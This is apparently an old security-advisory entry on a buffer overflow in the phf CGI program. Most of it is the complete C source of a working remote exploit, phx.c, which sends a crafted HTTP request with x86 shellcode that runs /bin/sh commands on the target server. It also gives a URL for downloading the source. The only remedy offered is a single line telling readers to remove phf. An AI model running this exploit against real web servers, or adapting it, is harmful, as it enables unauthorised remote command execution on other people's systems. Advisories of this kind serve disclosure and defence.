COMMAND

    phf

SYSTEMS AFFECTED

    phf

PROBLEM

    'proton' found  following.   Funny how  a program  thats almost  a
    decade old is still around to  haunt us, isnt it?  This  should be
    a potent reminder for all CGI authors out there that these  things
    can live forever.

    This exploit  will give  remote access  on most  (all?) Linux-ix86
    boxes (and freebsd?)  with phf installed,  patch or no  patch, its
    vulnerable.

    There is  only one  remedy, remove  it!   If your browser(s) trash
    the source below, you can also download it from

        http://www.energymech.net/users/proton/phx.c

    Here's the source:

    /*
     |  phx.c -- phf buffer overflow exploit for Linux-ix86
     |  Copyright (c) 2000 by proton. All rights reserved.
     |
     |  This program is free software; you can redistribute it and/or modify
     |  it under the terms of the GNU General Public License as published by
     |  the Free Software Foundation; either version 2 of the License, or
     |  (at your option) any later version.
     |
     |  This program is distributed in the hope that it will be useful,
     |  but WITHOUT ANY WARRANTY; without even the implied warranty of
     |  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
     |  GNU General Public License for more details.
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <errno.h>

    char    tmp[8192];
    char    *host;
    char    *progname;

    unsigned char shellcode[] = "GET /cgi-bin/phf?&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
            /*
             *  2 pointers, in case of -fomit-frame-pointer
             */
            "\x37\xfc\xff\xbf"
            "\x37\xfc\xff\xbf"
            " HTTP/1.0\n"
            /*
             *  set environment var `HTTP_X'
             */
            "X: "
            /*
             *  a bundle of AAA's, they're just as good as NOP's
             *  but is a tad bit more readable to humans.
             *  512 no-op instructions gives us a nice phat
             *  strike-zone for the above 2 pointers.
             */

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"
            /*
             *  exploit code
             */

    "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"

    "\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"

    "\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

    "\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
            "\x41\x41"
            /*
             *  try to make sense to the webserver
             */
            "/bin/sh -c echo 'Content-Type: text/plain';echo '';"
            /*
             *  execute something funny!
             */
            "echo Hello! I am running as \\\"`whoami`\\\" on a `arch` cpu;"
            "echo Local time is `date` and there are `who|wc -l` users logged in.;"
            "echo '';"
            /*
             *  shellcode will terminate command at the `@'
             */
            "@\n\n"
            ;

    void netpipe(int *rsock, int *wsock)
    {
            struct  sockaddr_in sai;
            struct  hostent *he;
            int     s;

            if (!host || !*host)
            {
                    printf("Usage: %s <host>\n",progname);
                    exit(1);
            }
            he = gethostbyname(host);
            if (!he)
            {
                    printf("%s: Unknown host\n",host);
                    exit(1);
            }

            s = socket(AF_INET,SOCK_STREAM,0);
            sai.sin_family = AF_INET;
            sai.sin_port = htons(80);
            memcpy(&sai.sin_addr,he->h_addr_list[0],sizeof(struct in_addr));

            if (connect(s,(struct sockaddr*)&sai,sizeof(sai)) < 0)
            {
                    switch(errno)
                    {
                    case ECONNREFUSED:
                            output("Connection refused.\n");
                            break;
                    case ETIMEDOUT:
                            output("Connection timed out.\n");
                            break;
                    case ENETUNREACH:
                            output("Network unreachable.\n");
                            break;
                    default:
                            output("Unknown error.\n");
                            break;
                    }
                    exit(1);
            }

            *rsock = *wsock = s;
    }

    int main(int argc, char **argv)
    {
            char    *q,*cp;
            int     in,out;
            int     sz,x,n;

            progname = argv[0];
            host = argv[1];

            netpipe(&in,&out);

            write(out,shellcode,sizeof(shellcode));

            output("\nCome to papa!\n\n");

            n = x = 0;
            for(;;)
            {
                    sz = read(in,&tmp[x],512-x);
                    if (sz < 1)
                            break;
                    x += sz;
                    q = cp = tmp;
                    for(sz=x;sz;)
                    {
                            if (*q == '\n')
                            {
                                    write(1,cp,(q-cp)+1);
                                    cp = q + 1;
                            }
                            q++;
                            sz--;
                    }
                    if (cp != tmp)
                    {
                            sz = x - (cp - tmp);
                            memcpy(tmp,cp,sz);
                            x -= (cp - tmp);
                    }
            }
            exit(0);
    }

SOLUTION

    Remove phf.